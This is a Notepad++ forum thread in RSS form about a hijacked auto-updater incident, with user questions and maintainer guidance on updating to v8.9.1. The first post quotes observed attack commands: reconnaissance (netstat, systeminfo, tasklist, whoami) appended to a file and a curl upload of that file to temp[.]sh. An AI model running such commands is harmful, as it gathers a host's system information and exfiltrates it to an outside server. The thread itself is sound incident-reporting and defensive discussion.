<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[autoupdater and connection temp.sh]]></title><description><![CDATA[<p dir="auto">Submission for any help regarding a finding that came through from AutoUpdater!?</p>
<p dir="auto">Malicious command seen:<br />
<code>curl.exe -F "file=@a.txt" -s https://temp[.]sh/upload</code></p>
<p dir="auto">This command appears to be maliciously exfiltrating data in “a.txt” to malicious domain “<code>https://temp[.]sh/upload</code>”.</p>
<p dir="auto">The activity appears to have started from<br />
notepad++.exe</p>
<p dir="auto">This then spawned the command:<br />
<code>"C:\\Program Files\\Notepad++\\updater\\gup.exe" -v8.84 -px64</code></p>
<p dir="auto">Which spawned:<br />
<code>"C:\\Users\\[user]\\AppData\\Local\\Temp\\AutoUpdater.exe" /closeRunningNpp /S /runNppAfterSilentInstall</code></p>
<p dir="auto">The hash for “AutoUpdater.exe” is unknown.</p>
<p dir="auto">Other commands seen:</p>
<pre><code>cmd /c netstat -ano &gt;&gt; a.txt
cmd /c systeminfo &gt;&gt; a.txt
cmd /c tasklist &gt;&gt; a.txt
cmd /c whoami &gt;&gt; a.txt
</code></pre>
<p dir="auto">From the original malicious command, it appears system information from the user was saved to “a.txt” and then exfiltrated to “<code>ttps://temp[.]sh/upload</code>” which likely corresponds to blocklisted IP “51[.]91[.]79[.]17”</p>
<p dir="auto">—</p>
<p dir="auto"><em>moderator added code markdown around text; please don’t forget to <a href="https://community.notepad-plus-plus.org/topic/21925/faq-desk-formatting-forum-posts">use the <code>&lt;/&gt;</code> button to mark example text as “code”</a> or `backticks` around <code>inline code</code> so that characters don’t get changed by the forum</em></p>
]]></description><link>https://community.notepad-plus-plus.org/topic/27212/autoupdater-and-connection-temp-sh</link><generator>RSS for Node</generator><lastBuildDate>Tue, 14 Apr 2026 09:42:36 GMT</lastBuildDate><atom:link href="https://community.notepad-plus-plus.org/topic/27212.rss" rel="self" type="application/rss+xml"/><pubDate>Thu, 23 Oct 2025 18:53:02 GMT</pubDate><ttl>60</ttl><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Tue, 10 Feb 2026 07:42:49 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="https://community.notepad-plus-plus.org/uid/3">@donho</a> ,<br />
Thanks for the verifcation, and sorry for the late reponse, I came down really sick that night for about a 5 day period after posting this, and am just getting back into the swing of things. Just wanted to make sure we didn’t need to be redundant about that process.  Thanks again for the clarification.</p>
]]></description><link>https://community.notepad-plus-plus.org/post/104696</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104696</guid><dc:creator><![CDATA[Lycan Thrope]]></dc:creator><pubDate>Tue, 10 Feb 2026 07:42:49 GMT</pubDate></item><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Fri, 06 Feb 2026 17:55:22 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="https://community.notepad-plus-plus.org/uid/38151">@Martin-1</a> said in <a href="/post/104655">autoupdater and connection temp.sh</a>:</p>
<blockquote>
<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="https://community.notepad-plus-plus.org/uid/3841">@PeterJones</a> That is what i meant. I don’t understand what is being said in those links or what is being said above. hence the repeat of my questions.</p>
</blockquote>
<p dir="auto">Then ask for clarification, rather than ask the same thing over and over.</p>
<p dir="auto">Besides, the <a href="https://notepad-plus-plus.org/news/clarification-security-incident/" rel="nofollow ugc">https://notepad-plus-plus.org/news/clarification-security-incident/</a> link that <a class="plugin-mentions-user plugin-mentions-a" href="https://community.notepad-plus-plus.org/uid/3">@donho</a> most recently posted seems pretty clear to me:</p>
<blockquote>
<h3>Who Was Targeted?</h3>
<p dir="auto">This was a highly selective attack by a state-sponsored group targeting specific high-value organizations. Security researchers confirmed that the vast majority of Notepad++ users were never affected - attackers filtered victims based on strategic value, not random distribution.</p>
<p dir="auto">For most users: Simply updating to the latest version is sufficient.</p>
</blockquote>
<p dir="auto">If you are a member of a a high-value organization, then you need to find someone on your IT team who does understand all the technical details.  (If you are unsure whether your organization would be considered “high value”, then it wouldn’t be.)  If you are not, then you are part of the “for most users” group.  And those instructions seem quite clear to me: manually update to v8.9.1.</p>
]]></description><link>https://community.notepad-plus-plus.org/post/104656</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104656</guid><dc:creator><![CDATA[PeterJones]]></dc:creator><pubDate>Fri, 06 Feb 2026 17:55:22 GMT</pubDate></item><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Fri, 06 Feb 2026 17:40:55 GMT]]></title><description><![CDATA[<p dir="auto">Just checked the date of the installer downloaded in the temp folder: UTC+0: 22:29.<br />
Also the statement from the provider says: “We discovered the suspicious events in our logs, which indicate that the server (where your application was hosted until the 1st of December, 2025) could have been compromised.”</p>
<p dir="auto">Anyway, I just installed the v8.9.1.<br />
I’ll try to not bother with it.<br />
Thank you!</p>
]]></description><link>https://community.notepad-plus-plus.org/post/104654</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104654</guid><dc:creator><![CDATA[josephskit]]></dc:creator><pubDate>Fri, 06 Feb 2026 17:40:55 GMT</pubDate></item><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Fri, 06 Feb 2026 17:33:06 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="https://community.notepad-plus-plus.org/uid/3841">@PeterJones</a> That is what i meant. I don’t understand what is being said in those links or what is being said above. hence the repeat of my questions.</p>
<p dir="auto">I am not trying to make waves here, this is just a bit above my understanding.</p>
<p dir="auto">I always try to ask simple questions in the hope to get simple answers just so I can understand it all.</p>
]]></description><link>https://community.notepad-plus-plus.org/post/104655</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104655</guid><dc:creator><![CDATA[Martin-1]]></dc:creator><pubDate>Fri, 06 Feb 2026 17:33:06 GMT</pubDate></item><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Fri, 06 Feb 2026 17:09:24 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="https://community.notepad-plus-plus.org/uid/38184">@josephskit</a> said in <a href="/post/104651">autoupdater and connection temp.sh</a>:</p>
<blockquote>
<p dir="auto">on the 2nd of december. Was the update still provided by the compromised server on that day?</p>
</blockquote>
<p dir="auto">Since the website remediation was “completed by the provider by December 2, 2025”, it presumably depends on what time of day it was when your update ran, and in what timezone you are in.  Since you are on the borderline day, the best practice, as stated above, would be to manually download and install the v8.9.1 installer.</p>
]]></description><link>https://community.notepad-plus-plus.org/post/104652</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104652</guid><dc:creator><![CDATA[PeterJones]]></dc:creator><pubDate>Fri, 06 Feb 2026 17:09:24 GMT</pubDate></item><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Fri, 06 Feb 2026 16:57:39 GMT]]></title><description><![CDATA[<p dir="auto">Hi, I’m sorry to bother you wth such a stupid question, but it’s just for peace of mind, even if I know that the attack was highly selective.<br />
Funnily the only time I have updated N++ during 2025 was on the 2nd of december. Was the update still provided by the compromised server on that day?</p>
]]></description><link>https://community.notepad-plus-plus.org/post/104651</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104651</guid><dc:creator><![CDATA[josephskit]]></dc:creator><pubDate>Fri, 06 Feb 2026 16:57:39 GMT</pubDate></item><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Fri, 06 Feb 2026 01:06:09 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="https://community.notepad-plus-plus.org/uid/38164">@Marten-van-Wezel</a> said in <a href="/post/104628">autoupdater and connection temp.sh</a>:</p>
<blockquote>
<p dir="auto">the “Auto-Updater” tickbox is greyed out and I can’t untick it.</p>
</blockquote>
<p dir="auto">You couldn’t untick it because of you also had the “Plugins Admin” selected at the same time (which needs the “Auto-Updater” component item for its functionality and thus “Auto-Updater” item cannot be unchecked until you also uncheck the “Plugins Admin”).</p>
<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="https://community.notepad-plus-plus.org/uid/38164">@Marten-van-Wezel</a> said in <a href="/post/104624">autoupdater and connection temp.sh</a>:</p>
<blockquote>
<p dir="auto">because my previous install did have gup.exe, it should be noted gup was not removed,</p>
</blockquote>
<p dir="auto">Yes, that was a problem before, should be fixed in v8.9+ installers by<br />
<a href="https://github.com/notepad-plus-plus/notepad-plus-plus/commit/e89b0be86193c41f8170315ce4f6aa2386e96cf0" rel="nofollow ugc">https://github.com/notepad-plus-plus/notepad-plus-plus/commit/e89b0be86193c41f8170315ce4f6aa2386e96cf0</a></p>
]]></description><link>https://community.notepad-plus-plus.org/post/104646</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104646</guid><dc:creator><![CDATA[xomx]]></dc:creator><pubDate>Fri, 06 Feb 2026 01:06:09 GMT</pubDate></item><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Fri, 06 Feb 2026 00:47:46 GMT]]></title><description><![CDATA[<p dir="auto">Might be helpful to clarify in the news article that direct website links weren’t compromised (possible since they apparently had server access) and that having auto-updater enabled but refusing the update would not have led to your device being compromised since these were two subtle points that took a bit of digging here to figure out.</p>
]]></description><link>https://community.notepad-plus-plus.org/post/104645</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104645</guid><dc:creator><![CDATA[Rai R]]></dc:creator><pubDate>Fri, 06 Feb 2026 00:47:46 GMT</pubDate></item><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Thu, 05 Feb 2026 16:23:38 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="https://community.notepad-plus-plus.org/uid/38164">@Marten-van-Wezel</a> said in <a href="/post/104624">autoupdater and connection temp.sh</a>:</p>
<blockquote>
<p dir="auto">after running the installer, because my previous install did have gup.exe, it should be noted gup was not removed, and npp in fact seems to happily use the old gup.exe now</p>
</blockquote>
<p dir="auto">That’s the worst of both worlds.  One of the points of manually downloading and installing v8.9.1 is that you don’t use the old gup for this single installation, but that the newer gup installed with v8.9.1 will have the added security features, so that auto-update will be more secure going forward.</p>
<p dir="auto">But by what you did, you are now running with the newest <code>notepad++.exe</code>, which is fine and dandy, but there was nothing wrong or insecure with that; but you are also running with an <em>old</em> <code>gup.exe</code>, so the updater/installer <em>doesn’t</em> currently have the additional security features, which is a bad thing.</p>
<p dir="auto">Either install the auto-updater when you manually install v8.9.1, so that you have the secure updater going foward, or manually delete the updater executables and dlls from <code>C:\Program Files\Notepad++\updater</code> (or the whole folder, really) if you don’t ever want auto-updater again.  But do <em>not</em> use the mix of new-Notepad++-and-old-gup.exe which you currently have.</p>
]]></description><link>https://community.notepad-plus-plus.org/post/104637</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104637</guid><dc:creator><![CDATA[PeterJones]]></dc:creator><pubDate>Thu, 05 Feb 2026 16:23:38 GMT</pubDate></item><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Thu, 05 Feb 2026 16:18:38 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="https://community.notepad-plus-plus.org/uid/38158">@Rickard-Ståhl</a> said in <a href="/post/104625">autoupdater and connection temp.sh</a>:</p>
<blockquote>
<p dir="auto">What is not clear to me is if a user clicks the “?” menu and then select “Update Notepad++”, if the update then is updated through the potentially compromised autoupdater function or if that is the same thing as downloading the MSI and installing it?</p>
</blockquote>
<p dir="auto">The <strong>? &gt; Update Notepad++</strong> uses the builtin updater function.</p>
<p dir="auto">In case it wasn’t clear: The <em>function</em> was not compromised.  The <em>website</em> was, and for a tiny subset of users, when the website was hacked during the given date range, the website would return incorrect information.  The website has been fixed already, so is no longer responding with incorrect information to anyone.</p>
<p dir="auto">In the interim, the <em>function</em> has been <em>improved</em> to do better checks, so that if the hackers get better than the new website security again, they will not be able to use the same attack vector.  That improved code would prevent downloading something based on incorrect information.</p>
<p dir="auto">If you are running a version older than v8.8.8, the function hasn’t been improved: it’s not inherently “dangerous”, per se, since the website has been fixed; but out of an abundance of caution, the recommendation is to manually go to the official v8.9.1 download page <a href="https://notepad-plus-plus.org/downloads/v8.9.1/" rel="nofollow ugc">https://notepad-plus-plus.org/downloads/v8.9.1/</a> which links to the download files stored on GitHub (or to go to the official GitHub releases page <a href="https://github.com/notepad-plus-plus/notepad-plus-plus/releases" rel="nofollow ugc">https://github.com/notepad-plus-plus/notepad-plus-plus/releases</a>, download the installer yourself, and run the installer yourself, thus ensuring that you get the improved updater.  After doing a manual download and installation of v8.9.1, the auto-updater will have the extra security features, and auto-update (or <strong>? &gt; Update Notepad++</strong>) will be more secure going forward.</p>
]]></description><link>https://community.notepad-plus-plus.org/post/104636</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104636</guid><dc:creator><![CDATA[PeterJones]]></dc:creator><pubDate>Thu, 05 Feb 2026 16:18:38 GMT</pubDate></item><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Thu, 05 Feb 2026 16:16:17 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="https://community.notepad-plus-plus.org/uid/38158">@Rickard-Ståhl</a></p>
<blockquote>
<p dir="auto">What is not clear to me is if a user clicks the “?” menu and then select “Update Notepad++”, if the update then is updated through the potentially compromised autoupdater function or if that is the same thing as downloading the MSI and installing it?</p>
</blockquote>
<p dir="auto">“Update Notepad++” command uses auto-updater (GUP.exe).<br />
At the bottom I provide the “simplied” clarification link for the concerned users.</p>
<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="https://community.notepad-plus-plus.org/uid/38164">@Marten-van-Wezel</a> &amp;<br />
“how to disable the auto-updater” is included in the link of bottom.</p>
<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="https://community.notepad-plus-plus.org/uid/38151">@Martin-1</a><br />
Short answer: Normal users are unlikely affected by this incident. Please see the link at the bottom.</p>
<p dir="auto">FYI, the new IoCs (Indicators of Compromise) are published in the following link:<br />
<strong><a href="https://notepad-plus-plus.org/news/clarification-security-incident/" rel="nofollow ugc">https://notepad-plus-plus.org/news/clarification-security-incident/</a></strong></p>
]]></description><link>https://community.notepad-plus-plus.org/post/104635</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104635</guid><dc:creator><![CDATA[donho]]></dc:creator><pubDate>Thu, 05 Feb 2026 16:16:17 GMT</pubDate></item><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Thu, 05 Feb 2026 14:54:52 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="https://community.notepad-plus-plus.org/uid/38151">@Martin-1</a> ,</p>
<p dir="auto">Your questions were answered in reply to your post.  Your questions were answered in the FAQ you were directed to.  Your questions were answered earlier in this Topic.  Please stop asking the same questions that have already been answered multiple times</p>
]]></description><link>https://community.notepad-plus-plus.org/post/104631</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104631</guid><dc:creator><![CDATA[PeterJones]]></dc:creator><pubDate>Thu, 05 Feb 2026 14:54:52 GMT</pubDate></item><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Thu, 05 Feb 2026 14:48:22 GMT]]></title><description><![CDATA[<p dir="auto">Hi,</p>
<p dir="auto">I created a new post not knowing this was already here. I do apologize.</p>
<p dir="auto">I am totally not in the know on any of these things so my questions are simple and I really can’t find an answer that tells me these things.</p>
<p dir="auto">As said, I understand very little about these sort of things. To start with:</p>
<ul>
<li>I have had Notepad++ installed on my system for years and always have the auto update turned on. Currently Notepad++ is at version 8.9. I am not sure when it updated to that version though.</li>
<li>I run Windows 11 and there as well, the moment there is an update I get it installed.</li>
<li>I use Kaspersky Premium to protect my system.</li>
</ul>
<p dir="auto">All I want to know are the following 3 things:</p>
<p dir="auto">1 - How do I know if my system was affected by this?<br />
2 - How do I clean the infection up if my system was affected by this?<br />
3 - What might they have stolen from my PC?</p>
<p dir="auto">They seem simple questions, but the answers I found were not really understandable for me.</p>
]]></description><link>https://community.notepad-plus-plus.org/post/104630</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104630</guid><dc:creator><![CDATA[Martin-1]]></dc:creator><pubDate>Thu, 05 Feb 2026 14:48:22 GMT</pubDate></item><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Thu, 05 Feb 2026 13:51:29 GMT]]></title><description><![CDATA[<p dir="auto">… and instant next post: after running the installer, because my previous install did have gup.exe, it should be noted gup was not removed, and npp in fact seems to happily use the old gup.exe now.  I’ve verified it’s digital signature (all OK) but still… a bit messy?</p>
]]></description><link>https://community.notepad-plus-plus.org/post/104624</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104624</guid><dc:creator><![CDATA[Marten van Wezel]]></dc:creator><pubDate>Thu, 05 Feb 2026 13:51:29 GMT</pubDate></item><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Thu, 05 Feb 2026 13:06:38 GMT]]></title><description><![CDATA[<p dir="auto">Thank you for the work and clarity. Just one weird question, when I try to install the latest npp (8.9.1 x64), the “Auto-Updater” tickbox is greyed out and I can’t untick it. Strangely, after playing around with this window a bit it allowed me to untick it, but in context of this attack it’s not a great look?</p>
<p dir="auto"><img src="/assets/uploads/files/1770296684758-explorer_xe2ci6qjml.png" alt="explorer_xe2Ci6qJMl.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://community.notepad-plus-plus.org/post/104628</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104628</guid><dc:creator><![CDATA[Marten van Wezel]]></dc:creator><pubDate>Thu, 05 Feb 2026 13:06:38 GMT</pubDate></item><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Thu, 05 Feb 2026 08:59:41 GMT]]></title><description><![CDATA[<p dir="auto">Hi</p>
<p dir="auto">If I understood the security issue correctly then it was the autoupdate functionallity that was compromised and that the advice is to download the latest version from the website and update.</p>
<p dir="auto">What is not clear to me is if a user clicks the “?” menu and then select “Update Notepad++”, if the update then is updated through the potentially compromised autoupdater function or if that is the same thing as downloading the MSI and installing it?</p>
<p dir="auto">I just want to be clear with the instructions to the users.</p>
]]></description><link>https://community.notepad-plus-plus.org/post/104625</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104625</guid><dc:creator><![CDATA[Rickard Ståhl]]></dc:creator><pubDate>Thu, 05 Feb 2026 08:59:41 GMT</pubDate></item><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Wed, 04 Feb 2026 12:54:56 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="https://community.notepad-plus-plus.org/uid/23651">@Lycan-Thrope</a></p>
<blockquote>
<p dir="auto">so if I’ve already auto-updated from 8.8.8 to 8.9.1, would it be necessary or advised to run it again, manually?</p>
</blockquote>
<p dir="auto">Once you have v8.9.1 installed, it won’t be necessary to update your  Notepad++ manually - you can just let auto-updater do its job.</p>
]]></description><link>https://community.notepad-plus-plus.org/post/104604</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104604</guid><dc:creator><![CDATA[donho]]></dc:creator><pubDate>Wed, 04 Feb 2026 12:54:56 GMT</pubDate></item><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Wed, 04 Feb 2026 12:54:03 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="https://community.notepad-plus-plus.org/uid/3">@donho</a>, so if I’ve already auto-updated from 8.8.8 to 8.9.1, would it be necessary or advised to run it again, manually?</p>
]]></description><link>https://community.notepad-plus-plus.org/post/104596</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104596</guid><dc:creator><![CDATA[Lycan Thrope]]></dc:creator><pubDate>Wed, 04 Feb 2026 12:54:03 GMT</pubDate></item><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Wed, 04 Feb 2026 04:11:52 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="https://community.notepad-plus-plus.org/uid/3">@donho</a> Thank you, I did just that (manual update). My older install turned out to be fine as well, thanks to the brilliant strategy of apparently having clicked no to the update prompt for the past 6 years… :)</p>
]]></description><link>https://community.notepad-plus-plus.org/post/104600</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104600</guid><dc:creator><![CDATA[testname]]></dc:creator><pubDate>Wed, 04 Feb 2026 04:11:52 GMT</pubDate></item><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Wed, 04 Feb 2026 03:03:00 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="https://community.notepad-plus-plus.org/uid/288">@xomx</a> said in <a href="/post/104573">autoupdater and connection temp.sh</a>:</p>
<blockquote>
<p dir="auto">the investigation is still ongoing and <a class="plugin-mentions-user plugin-mentions-a" href="https://community.notepad-plus-plus.org/uid/3">@donho</a> will surely disclose more whenever/if it’ll be possible to do so.</p>
</blockquote>
<p dir="auto">Unfortunatly, the investigation actually concluded the day of the announcement (just after the announcement). As I mentioned at the bottom of <a href="https://notepad-plus-plus.org/news/hijacked-incident-info-update/" rel="nofollow ugc">my announce <em><strong>Edit (February 2, 2026)</strong></em></a>, the IR team was unable to determine the hijacking method, : <code>Our IR team spent a week analyzing roughly 400 GB of server logs provided by the former hosting provider. While signs of an intrusion were identified, no concrete indicators of compromise - such as binary hashes, domains, or IP addresses - were found.</code></p>
]]></description><link>https://community.notepad-plus-plus.org/post/104595</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104595</guid><dc:creator><![CDATA[donho]]></dc:creator><pubDate>Wed, 04 Feb 2026 03:03:00 GMT</pubDate></item><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Wed, 04 Feb 2026 02:44:13 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="https://community.notepad-plus-plus.org/uid/38129">@testname</a></p>
<blockquote>
<p dir="auto">As the update feature from that version onwards, no longer pointed to the compromised domain. And as such if you have 8.8.8 installed, the only way for it to be compromised is if it was automatically updated from an older version, rather than installed directly?</p>
</blockquote>
<p dir="auto">If you have 8.8.8 installed and if you update to the new version manually, you’re not concerned by this incident.</p>
<p dir="auto">The current state is, with the new hosting provider, the auto-update hijacked issue is fixed.</p>
<p dir="auto">Furthermore, even though the v8.8.8 did not fully address the issue, it’s safe due to its “partial” fix according the hijacking schema, if you use auto-updater:<br />
<code>Security enhancement: prevent Notepad++ Updater from being hijacked. </code></p>
<p dir="auto">Of course, it’s better to update manually to v8.9.1 so you won’t worry about auto-updating in the future.</p>
]]></description><link>https://community.notepad-plus-plus.org/post/104594</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104594</guid><dc:creator><![CDATA[donho]]></dc:creator><pubDate>Wed, 04 Feb 2026 02:44:13 GMT</pubDate></item><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Wed, 04 Feb 2026 00:11:36 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="https://community.notepad-plus-plus.org/uid/288">@xomx</a> Really appreciate you leaving this reply.</p>
<p dir="auto">Could I just double check something to put my mind at ease:</p>
<p dir="auto">I installed notepad++ on a new machine in mid november (listed build time nov 16, installed nov 25 from a github sourced exe), so version 8.8.8. Am I understanding things correctly that this should basically put me in the clear?</p>
<p dir="auto">As the update feature from that version onwards, no longer pointed to the compromised domain. And as such if you have 8.8.8 installed, the only way for it to be compromised is if it was automatically updated from an older version, rather than installed directly?</p>
<p dir="auto">Thanks again.</p>
]]></description><link>https://community.notepad-plus-plus.org/post/104593</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104593</guid><dc:creator><![CDATA[testname]]></dc:creator><pubDate>Wed, 04 Feb 2026 00:11:36 GMT</pubDate></item><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Tue, 03 Feb 2026 02:30:00 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="https://community.notepad-plus-plus.org/uid/288">@xomx</a> said in <a href="/post/104573">autoupdater and connection temp.sh</a>:</p>
<blockquote>
<p dir="auto">I’d like to invite any of you using the N++ who are good at security, to also contribute a little of your experience and time for keeping this app up-to-date from a security POV.</p>
</blockquote>
<p dir="auto">A great idea, if late in coming. But I also can’t deny the truth of this <a href="https://web.archive.org/web/20260203015137/https://forums.theregister.com/forum/all/2026/02/02/notepad_plusplus_intrusion/#c_5221614" rel="nofollow ugc">hot take</a> from a reader of <em>The Register</em>’s <a href="https://www.theregister.com/2026/02/02/notepad_plusplus_intrusion/" rel="nofollow ugc">article</a> about this event:</p>
<blockquote>
<p dir="auto">[U]ltimately it’s Microsoft who caused this by deciding to have an ecosystem where securely distributing your software costs $300 per year […]</p>
</blockquote>
<p dir="auto">I would even suggest — if you want to do the most good with your contribution — give it to a project involved in bringing the Notepad++ experience to other platforms (<em>via</em> Qt 6, e.g.,<a href="https://github.com/dail8859/NotepadNext" rel="nofollow ugc">NotepadNext</a>) or even <a href="https://github.com/PedroGruvhagen/Notepadplusplus-MacOS" rel="nofollow ugc">MacOS</a>.</p>
<p dir="auto">Windows was never a suitable environment for open source, and even its historically dominant user base will shrink as more and more people realize they cannot safely do personal computing on a device with AI surveillance permanently baked-in to the operating system.</p>
]]></description><link>https://community.notepad-plus-plus.org/post/104585</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104585</guid><dc:creator><![CDATA[rdipardo]]></dc:creator><pubDate>Tue, 03 Feb 2026 02:30:00 GMT</pubDate></item><item><title><![CDATA[Reply to autoupdater and connection temp.sh on Mon, 02 Feb 2026 22:47:27 GMT]]></title><description><![CDATA[<p dir="auto">Addendum to the points 2. &amp; 3. above - even if you’re not to Reverse Engineering much, just follow the link and skip it to the ending “Indicators of compromise” part, where are some common markers that could help you decide whether or not your comp has been compromised:</p>
<p dir="auto"><a href="https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/" rel="nofollow ugc">https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/</a></p>
]]></description><link>https://community.notepad-plus-plus.org/post/104583</link><guid isPermaLink="true">https://community.notepad-plus-plus.org/post/104583</guid><dc:creator><![CDATA[xomx]]></dc:creator><pubDate>Mon, 02 Feb 2026 22:47:27 GMT</pubDate></item></channel></rss>